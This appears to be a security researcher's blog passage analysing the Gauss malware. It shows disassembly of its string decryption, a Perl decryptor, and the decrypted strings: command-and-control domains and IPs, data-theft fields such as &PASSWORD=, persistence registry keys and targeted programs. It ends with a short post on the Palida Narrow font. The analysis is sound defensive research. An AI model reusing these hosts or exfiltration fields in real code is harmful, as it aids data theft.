.text:10007DF0 push ebx
.text:10007DF1 xor ebx, ebx
.text:10007DF3 xor edx, edx
.text:10007DF5 cmp [ecx+0Ah], bx
.text:10007DF9 jbe short loc_10007E16
.text:10007DFB
.text:10007DFB loc_10007DFB: ; CODE XREF: Decrypt_str_10007DDE+36j
.text:10007DFB mov al, dl
.text:10007DFD add al, 6Eh
.text:10007DFF imul bl
.text:10007E01 mov bl, 0C2h
.text:10007E03 sub bl, al
.text:10007E05 sub bl, dl
.text:10007E07 add [edx+esi], bl
.text:10007E0A mov bl, [edx+esi]
.text:10007E0D movzx eax, word ptr [ecx+0Ah]
.text:10007E11 inc edx
.text:10007E12 cmp edx, eax
.text:10007E14 jb short loc_10007DFB
.text:10007E16
.text:10007E16 loc_10007E16: ; CODE XREF: Decrypt_str_10007DDE+1Bj
.text:10007E16 mov eax, esi
.text:10007E18 pop ebx
.text:10007E19 mov byte ptr [ecx+0Ch], 42h
.text:10007E1D pop esi
.text:10007E1E retn
.text:10007E1E Decrypt_str_10007DDE endp
.text:10007E1E
.text:10007E1F
.text:10007E1F ; =============== S U B R O U T I N E =======================================
.text:10007E1F
.text:10007E1F
.text:10007E1F srand_10007E1F proc near ; CODE XREF: sub_10003377+Dp
.text:10007E1F push 0 ; Time
.text:10007E21 call ds:time
.text:10007E27 push eax ; Seed
.text:10007E28 call ds:srand
.text:10007E2E pop ecx
.text:10007E2F pop ecx
.text:10007E30 retn
.text:10007E30 srand_10007E1F endp
.text:10007E30

basically the structure is of a stream-cipher, where the generated key is not XORd, but ADDed to the encrypted byte to be decrypted. This is very similar to flame. dl is a counter, so the main thing is bl and the imul function. It’s not that complicated or novel, but still interesting.

It’s a bit strange, as the encrypted string table basically consists of some 3-tuple elements, and only the middle on is encrypted by the code above. It is similar, but not that similar to other Duqu or Flame encryption technique.

Here is some perl code to make a simple decryptor:

tobedecrypted:$t

$al=$dl;
$al= ($al+ 0x6e)%256;
$ax=$al*$bl % 65536; #imul bl?
$al=$ax % 256;
$bl= 0xc2;
$bl= ($bl -$al) %256;
$bl= ($bl -$dl) %256;
$t2= ($t+$bl) %256;
$bl= $t2;
$dl= ($dl+1) %256; #in fact dx, but dh is not used only as loop variable

$bufall2.=pack("C",$t2);
$i+=1;
if ($new==1)
{
$bl=0;
$dl=0;
}

output buffer: $bufall2

So after all, we can decrypt main strings. This encryption technique was not changed between 4.00-5.00 versions and also relates to USB (U) versions, too.

For v5.00 we get the following strings


bdagent.exe
%yJ^
outpost.exe
`icsvnt32a.ocx
Global\AdvTW32Ready500WfEvent
8Global\AdvTW32SyncEvent
lnkfile\shellex\IconHandler
{00021401-0000-0000-C000-000000000046}
dgfw
(icsvnt32.ocx
%windir%\system32\
%allusersprofile%\
msfrmt32.dll
gGlobal\ShellTRPInitEvent
Global\AdvTW32AutoDetect
8Global\MICEvent
(Global\TUSEvent
L1---
Global\ShlZoneSynchMutex
vbtLw
%allusersprofile%\mstlis.log
4|k
Iphlpapi.dll
Ws2_32.dll
\SS_data.bmp.ppm
%temp%\tksp1.tmp
W%temp%\tksp2.tmp
%temp%\tksp3.tmp
W%temp%\tksp4.tmp
%temp%\tksp7.tmp
%temp%\tksp8.tmp
]ContLo.txt
Cont.txt

ChannelD.txt

ChannelC.txt
ChannelB.txt
[ChannelA.txt
zFIONA
nSONIA
) Ti
hELVIS
0EVE
JC,B
DRAKE
xCHARLES
ALEX
BARBARA
tTIFFANY
pEOC
(
P%allusersprofile%\datFE2B.da1
%temp%\daa59.tmp
Q%windir%\system32\msfrmt32.dll
FiV=.
DllStartServer
P)mVu
jDllSto
77?'
lk_data.txt
%^no

inet_addr
inet_ntoa
htonl
ntohs
htons
GetAdaptersInfo
OGetBestInterface
RearWindow detected no activity since delta started, maybe no one logged in?.
+*#PFl+
RearWindow failed.
RearWindow throw an exception.
function returned:
BARBAR
BARBAR
Alex ends. Result is:
Alex Starts
Sam ends. Result is:
nH,1
Sam Starts
9Yg3d
Charles ends. Result is:
Charles Starts
Drake ends. Result is:
Drake Starts
tWO8
Elvis ends. Result is:
Elvis Starts
Eve ends. Result is:
Eve Starts
Sonia ends. Result is:
=1g3
Sonia Starts
'W~~
Fiona ends. Result is:
)OOQ
Fiona Starts
S{+w\
h&K=
{%mk
$&FILE_NAME=
&ACTION=
&COMP_ID=
@&LOGGED_ON=
&SEC_COUNT=
&SUC_CMD_ATTEMPTS=
&CMD_ATTEMPTS=
&COMPUTER_NAME=
P&MAC=
(&IP=
&SERVICE_PACK=
&VERSION_INFO=
+&LI=
&COM_B=
SP v5.00H
@&TOOL_B=
Rdw^,Q
h0T^
&PASSWORD=
@&n8
UNIQUE_NUMBER=
jIQ:
85.25.0.24
LifeS
Q194.192.14.125
Grendercodec.info
videosy
nvidiastream.info
nvidiadrivers.i
202.75.58.179
nvidiasoft.info
syncstream.info
xflashupdates.info
/cgi-bin/counter.cgi
KSYSTEM\CurrentControlSet\Control\TimeZoneInformation
+!XQ
StandardTimeBias
StandardDateBias
SYSTEM\CurrentControlSet\Hardware Profiles\Current\Software\Fonts
PixelShader
advapi32.dll
Global\TRStepEvent
aah/x
sGlobal\MSTKCSrvEvent
vqL7
%allusersprofile%\icsvntu32.ocx
oC7g
Global\ShlZoneDataMutex
SYSTEM
svchost.exe
TRegNotifyChangeKeyVa
"'F/
explorer
KSOFTWARE\Classes\CLSID{35CEC8A3-2BE6-11D2-8773-92E220524153}\InProcServer32
SOFTWARE\Classes\CLSID{450D8FBA-AD25-11D0-98A8-0800361B1103}\InProcServer32
mydocs.dll
SOFTWARE\Classes\CLSID{35CEC8A3-2BE6-11D2-8773-92E220524153}\InprocServer32
SOFTWARE\Classes\CLSID{4E14FBA2-2E22-11D1-9964-00C04FBBB345}\InprocServer32
%windir%\System32\es.dll
MACHINE\SOFTWARE\Classes\CLSID{4E14FBA2-2E22-11D1-9964-00C04FBBB345}\InprocServer32
DllUnregisterServer
DllRegisterServer
DllGetClassObject
%a+8@9
DllCanUnloadNow
LSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
PDefaultUserName
6Dq6
hNUL=
kernel32.dll
t_b|&
uGetIfTable
+iphlpapi.dll
shlwapi.dll
0PathS
?A5!
RevertToSelf
ImpersonateLoggedOnUser
XU-
RegOverridePredefKey
RegOpenCurrentUser
OpenProcessToken
LoadLibraryA
cVirtualAlloc
VirtualFree
VirtualProtect
)GetProcAddress
%allusersprofile%\Wnm.tmp
ProxyOverride
ProxyServer
ProxyEnable
0Software\Microsoft\Windows\CurrentVersion\Internet Settings
www.google.com
0Deskto
@Onenotem.exe
&?G?
Onenote.exe
paltalk.exe
mmc.exe
d&|
us
mstsc.exe
ypager.exe
visio.exe
TE$o
powerpnt.exe
winproj.exe
k (c>
notepad.exe
netscape.exe
putty.exe
ftp.exe
telnet.exe
%exceed.exe
H`vS
sinetinfo.exe
icqlite.exe
icq.exe
@frontpage.exe
aim95.exe
(aim.exe
acrord32.exe
|acrobat.exe
Cygwin.exe
msdev.exe
xmsnmsgr.exe
msgplus.exe
hmsmsgs.exe
excel.exe
HWINWORD.exe
msimn.exe
OUTLOOK.exe
Mozilla.exe
firefox.exe
iexplore.exe

We did not cross-check it, but strange that it’s BARBAR here and not BARBARA (might be the fault of the decryptor).
The more interesting is that everybody was so interested in the language of recent targeted malware (Duqu, Flame, Gauss) and we could not get much “language mistakes” in those cases. Compared to that this is strange:


Alex ends. Result is:
Alex Starts

“Result is” is strange. “Starts” with capital S (for all functions, and all knows versions of the malware) is also strange.

<

p>
“RearWindow throw an exception.” – throw or throws? surely strange. This type of error was never convicted in Duqu and Flame or we were not able to find such yet.

Posted on Leave a comment

Palida Narrow vs. Lucida Bright

It seems Gauss samples already started to float around, so some more info on Palida is not a surprise anymore.

Palida Narrow header info:

'head' Table - Font Header

Size = 54 bytes (expecting 54 bytes)
'head' version: 1.0
fontRevision: 1.1
checkSumAdjustment: 0xC5C64B82
magicNumber: 0x5F0F3CF5
flags: 0x001B- baseline(y)=0 - lsb(x)=0 - int ppem - nonlin aw
unitsPerEm: 2048
created: Fri Jan 28 21:48:24 2000
modified: Mon Dec 19 05:37:00 2011
xMin: -579
yMin: -804
xMax: 2298
yMax: 2033
macStyle bits: 0x0000
lowestRecPPEM: 12
fontDirectionHint: 1
indexToLocFormat: 0
glyphDataFormat: 0

Lucida Bright Regular header info:

'head' Table - Font Header

Size = 54 bytes (expecting 54 bytes)
'head' version: 1.0
fontRevision: 1.1
checkSumAdjustment: 0x8A94C916
magicNumber: 0x5F0F3CF5
flags: 0x001B- baseline(y)=0 - lsb(x)=0 - int ppem - nonlin aw
unitsPerEm: 2048
created: Fri Jan 28 19:13:11 2000
modified: Tue Mar 13 23:02:32 2001
xMin: -550
yMin: -1530
xMax: 3314
yMax: 2419
macStyle bits: 0x0000
lowestRecPPEM: 12
fontDirectionHint: 1
indexToLocFormat: 1
glyphDataFormat: 0

You can see the similarity in creation date.
The interesting thing is that Palida has 457 glyphs:

'maxp' Table - Maximum Profile

Size = 32 bytes (expecting 32 bytes)
'maxp' version: 1.0
numGlyphs: 457

from which some special characters are unusual


Glyf 440 -> PSGlyf Name # 192, name= 'dcaron1'
Glyf 441 -> PSGlyf Name # 193, name= 'Gcedilla1'
Glyf 442 -> PSGlyf Name # 194, name= 'gcedilla1'
Glyf 443 -> PSGlyf Name # 195, name= 'Kcedilla1'
Glyf 444 -> PSGlyf Name # 196, name= 'kcedilla1'
Glyf 445 -> PSGlyf Name # 197, name= 'Lcedilla1'
Glyf 446 -> PSGlyf Name # 198, name= 'lcedilla1'
Glyf 447 -> PSGlyf Name # 199, name= 'Lcaron1'
Glyf 448 -> PSGlyf Name # 200, name= 'lcaron1'
Glyf 449 -> PSGlyf Name # 201, name= 'Ncedilla1'
Glyf 450 -> PSGlyf Name # 202, name= 'ncedilla1'
Glyf 451 -> PSGlyf Name # 203, name= 'Rcedilla1'
Glyf 452 -> PSGlyf Name # 204, name= 'rcedilla1'

Or the fact the physics and math is so important that first glyphs are micro and Ohm.


-------------------------
PSGlyf Name # 1: micro
PSGlyf Name # 2: Ohm
PSGlyf Name # 3: increment
PSGlyf Name # 4: bulletmath
PSGlyf Name # 5: overscore
PSGlyf Name # 6: dmacron

One of the interesting glyphs is U+0104 also called Aogonek. First of all it exists mostly in CE fonts, second, it is a bit different from Lucida samples we checked. Check it yourself, too!